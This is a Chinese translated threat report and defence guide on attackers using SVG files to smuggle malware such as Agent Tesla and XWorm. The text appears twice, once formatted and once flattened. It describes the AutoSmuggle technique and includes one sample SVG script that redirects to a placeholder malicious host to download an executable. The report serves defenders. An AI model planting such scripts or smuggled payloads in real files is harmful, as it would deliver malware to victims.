[翻译]SVG 文件在新兴攻击活动中的滥用报告
字数 1994 2025-08-23 18:31:25

SVG文件在恶意攻击中的滥用分析与防御指南

1. SVG文件滥用概述

可扩展矢量图形(SVG)文件已成为恶意软件传递的高级载体,其使用方式随时间发生了显著变化。SVG文件因其独特的文件特性和较低的怀疑度而被攻击者广泛利用。

1.1 主要滥用历史记录

  • 2015年:首次大规模用于传递勒索软件
  • 2017年1月:用于通过URL投递Ursnif恶意软件
  • 2022年:用于投递嵌入.zip压缩文件(内含QakBot)
  • 2023年:与CVE-2023-5631漏洞结合攻击Roundcube服务器
  • 2023-2024年:两个主要攻击活动分别投递XWorm RAT和Agent Tesla Keylogger

2. AutoSmuggle工具分析

AutoSmuggle是2022年5月发布的开源工具,专门用于简化通过SVG或HTML文件"走私"恶意文件的过程。

2.1 工作原理

  1. 获取任意文件类型(如.exe或打包文件)
  2. 将其编码并嵌入到SVG或HTML文件中
  3. 当受害者打开文件时,"走私"的文件被解密并投递

2.2 技术特点

  • 使用base64ToArrayBuffer方法进行编码(属于9种常见HTML走私技术之一)
  • 主要采用.zip存档嵌入SVG文件的方式
  • 目的是绕过安全电子邮件网关(SEG)和其他网络防御措施

3. SVG文件投递恶意软件的两种主要方式

3.1 JavaScript直接下载

特点

  • 早期使用方式(2015-2017年)
  • SVG文件包含嵌入式URL
  • 打开时从外部源下载恶意内容
  • 可能显示图像分散受害者注意力

示例代码特征

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
    <script>
        window.location.href="hxxp://malicious[.]com/payload.exe";
    </script>
</svg>

3.2 HTML样式嵌入对象

特点

  • 较新的使用方式(2022年后)
  • 不依赖外部资源,直接嵌入恶意内容
  • 通常不显示图像,依赖受害者好奇心
  • 使用AutoSmuggle等工具生成

技术优势

  • SVG文件比HTML或压缩包更不易引起怀疑
  • 被视为图像文件而非可执行文件
  • 更容易绕过传统安全检测

4. 近期攻击活动分析

4.1 Agent Tesla Keylogger攻击活动(2024年1月)

感染链

  1. 电子邮件附带SVG文件
  2. 打开SVG释放嵌入的.zip存档
  3. 存档包含JavaScript文件
  4. JS文件从BlogSpot下载多个payload
  5. 最终运行Agent Tesla键盘记录器

技术特点

  • 修改AutoSmuggle生成的SVG文件
  • 删除默认图像生成代码
  • 添加浏览器重定向到maersk网页的代码
  • 使下载看似来自合法来源

4.2 XWorm RAT攻击活动(2023年12月)

三种感染链变体

  1. 变体一

    • 附带PDF文件含嵌入式链接
    • 链接下载SVG文件
    • SVG释放.zip存档含VBS文件
    • VBS从免费托管服务下载payload
    • 最终运行XWorm RAT

  2. 变体二

    • 电子邮件含嵌入式链接
    • 链接下载SVG文件
    • SVG释放.zip存档含WSF脚本
    • WSF脚本下载并运行XWorm RAT

  3. 变体三

    • 直接附带SVG文件
    • 打开释放.zip存档含VBS文件
    • VBS下载并运行XWorm RAT

技术特点

  • 仅删除AutoSmuggle默认图像代码
  • 不添加重定向功能
  • 打开后显示空白页面

5. 防御措施建议

5.1 技术防护

  1. 邮件安全

    • 配置SEG检测嵌入对象的SVG文件
    • 对SVG文件内容进行深度检查
    • 阻止或隔离可疑的SVG附件

  2. 终端防护

    • 禁用浏览器自动下载功能
    • 限制SVG文件中的脚本执行
    • 实施应用程序白名单

  3. 网络防护

    • 监控异常外联请求
    • 阻止访问已知恶意托管服务(BlogSpot等)
    • 实施严格的出站流量过滤

5.2 策略与培训

  1. 安全意识培训

    • 教育员工识别可疑SVG文件
    • 强调不打开意外附件的重要性
    • 培训验证发件人身份的方法

  2. 安全策略

    • 限制SVG文件在企业网络中的使用
    • 实施文件类型限制策略
    • 建立可疑文件报告流程

  3. 应急响应

    • 制定SVG恶意文件事件响应计划
    • 定期演练相关攻击场景
    • 建立快速隔离和清除机制

6. 检测指标(IoCs)

6.1 文件特征

  • SVG文件中包含base64ToArrayBuffer函数
  • 存在嵌入式.zip或.exe的Base64编码数据
  • 包含"Redirect after a delay"等可疑注释
  • 文件大小异常(通常大于普通SVG图像)

6.2 行为特征

  • 打开SVG后自动触发文件下载
  • 尝试连接免费托管服务或BlogSpot
  • 短时间内多阶段payload下载
  • 尝试注入或修改注册表项

7. 总结

SVG文件因其特性已成为恶意软件投递的重要载体,随着AutoSmuggle等工具的出现,这种攻击方式变得更加普遍和高效。防御此类攻击需要多层次的安全措施,包括技术控制、策略制定和用户教育。安全团队应特别关注SVG文件中嵌入的可执行内容,并保持对新兴攻击手法的持续监测。

SVG文件在恶意攻击中的滥用分析与防御指南 1. SVG文件滥用概述 可扩展矢量图形(SVG)文件已成为恶意软件传递的高级载体,其使用方式随时间发生了显著变化。SVG文件因其独特的文件特性和较低的怀疑度而被攻击者广泛利用。 1.1 主要滥用历史记录 2015年 :首次大规模用于传递勒索软件 2017年1月 :用于通过URL投递Ursnif恶意软件 2022年 :用于投递嵌入.zip压缩文件(内含QakBot) 2023年 :与CVE-2023-5631漏洞结合攻击Roundcube服务器 2023-2024年 :两个主要攻击活动分别投递XWorm RAT和Agent Tesla Keylogger 2. AutoSmuggle工具分析 AutoSmuggle是2022年5月发布的开源工具,专门用于简化通过SVG或HTML文件"走私"恶意文件的过程。 2.1 工作原理 获取任意文件类型(如.exe或打包文件) 将其编码并嵌入到SVG或HTML文件中 当受害者打开文件时,"走私"的文件被解密并投递 2.2 技术特点 使用 base64ToArrayBuffer 方法进行编码(属于9种常见HTML走私技术之一) 主要采用.zip存档嵌入SVG文件的方式 目的是绕过安全电子邮件网关(SEG)和其他网络防御措施 3. SVG文件投递恶意软件的两种主要方式 3.1 JavaScript直接下载 特点 : 早期使用方式(2015-2017年) SVG文件包含嵌入式URL 打开时从外部源下载恶意内容 可能显示图像分散受害者注意力 示例代码特征 : 3.2 HTML样式嵌入对象 特点 : 较新的使用方式(2022年后) 不依赖外部资源,直接嵌入恶意内容 通常不显示图像,依赖受害者好奇心 使用AutoSmuggle等工具生成 技术优势 : SVG文件比HTML或压缩包更不易引起怀疑 被视为图像文件而非可执行文件 更容易绕过传统安全检测 4. 近期攻击活动分析 4.1 Agent Tesla Keylogger攻击活动(2024年1月) 感染链 : 电子邮件附带SVG文件 打开SVG释放嵌入的.zip存档 存档包含JavaScript文件 JS文件从BlogSpot下载多个payload 最终运行Agent Tesla键盘记录器 技术特点 : 修改AutoSmuggle生成的SVG文件 删除默认图像生成代码 添加浏览器重定向到maersk网页的代码 使下载看似来自合法来源 4.2 XWorm RAT攻击活动(2023年12月) 三种感染链变体 : 变体一 : 附带PDF文件含嵌入式链接 链接下载SVG文件 SVG释放.zip存档含VBS文件 VBS从免费托管服务下载payload 最终运行XWorm RAT 变体二 : 电子邮件含嵌入式链接 链接下载SVG文件 SVG释放.zip存档含WSF脚本 WSF脚本下载并运行XWorm RAT 变体三 : 直接附带SVG文件 打开释放.zip存档含VBS文件 VBS下载并运行XWorm RAT 技术特点 : 仅删除AutoSmuggle默认图像代码 不添加重定向功能 打开后显示空白页面 5. 防御措施建议 5.1 技术防护 邮件安全 : 配置SEG检测嵌入对象的SVG文件 对SVG文件内容进行深度检查 阻止或隔离可疑的SVG附件 终端防护 : 禁用浏览器自动下载功能 限制SVG文件中的脚本执行 实施应用程序白名单 网络防护 : 监控异常外联请求 阻止访问已知恶意托管服务(BlogSpot等) 实施严格的出站流量过滤 5.2 策略与培训 安全意识培训 : 教育员工识别可疑SVG文件 强调不打开意外附件的重要性 培训验证发件人身份的方法 安全策略 : 限制SVG文件在企业网络中的使用 实施文件类型限制策略 建立可疑文件报告流程 应急响应 : 制定SVG恶意文件事件响应计划 定期演练相关攻击场景 建立快速隔离和清除机制 6. 检测指标(IoCs) 6.1 文件特征 SVG文件中包含 base64ToArrayBuffer 函数 存在嵌入式.zip或.exe的Base64编码数据 包含"Redirect after a delay"等可疑注释 文件大小异常(通常大于普通SVG图像) 6.2 行为特征 打开SVG后自动触发文件下载 尝试连接免费托管服务或BlogSpot 短时间内多阶段payload下载 尝试注入或修改注册表项 7. 总结 SVG文件因其特性已成为恶意软件投递的重要载体,随着AutoSmuggle等工具的出现,这种攻击方式变得更加普遍和高效。防御此类攻击需要多层次的安全措施,包括技术控制、策略制定和用户教育。安全团队应特别关注SVG文件中嵌入的可执行内容,并保持对新兴攻击手法的持续监测。